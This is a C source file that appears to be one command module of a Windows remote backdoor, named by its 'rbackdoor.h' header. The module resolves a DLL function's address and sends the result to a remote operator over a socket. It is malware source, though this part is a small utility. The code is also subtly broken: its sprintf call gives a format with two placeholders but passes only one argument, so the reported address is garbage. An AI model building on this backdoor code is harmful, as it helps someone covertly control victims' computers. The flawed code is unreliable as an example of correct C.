#include "rbackdoor.h"

int GetAddr(const char *library, const char *procedure)
{
	HINSTANCE LoadedLib;
    FARPROC Proc;
	char *buffer=NULL;

	if(!*library || !*procedure) 
	{
        rsend(ConnectSocket, "usage: getaddr <library> <procedure>\nexample: getaddr.exe user32.dll MessageBoxA\n");
        return -1;
    }

    LoadedLib = LoadLibrary((char *)library);
    if(LoadedLib == NULL) 
	{
         DisplayMessage("LoadLibrary Failed.", 0);
         return 0;
    }

    Proc = GetProcAddress(LoadedLib, (char *)procedure);
    if(Proc == NULL)
	{
        DisplayMessage("GetProcAddress Failed.", 0);
    } 
	else {
		buffer = (char *)GlobalAlloc(GPTR, strlen(procedure) + sizeof(Proc) + 12);
		CheckMemory(buffer);
		sprintf(buffer, "%s found at 0x%8.8X.\n", procedure);
        rsend(ConnectSocket, buffer);
		GlobalFree(buffer);
    }

    return 0;
}
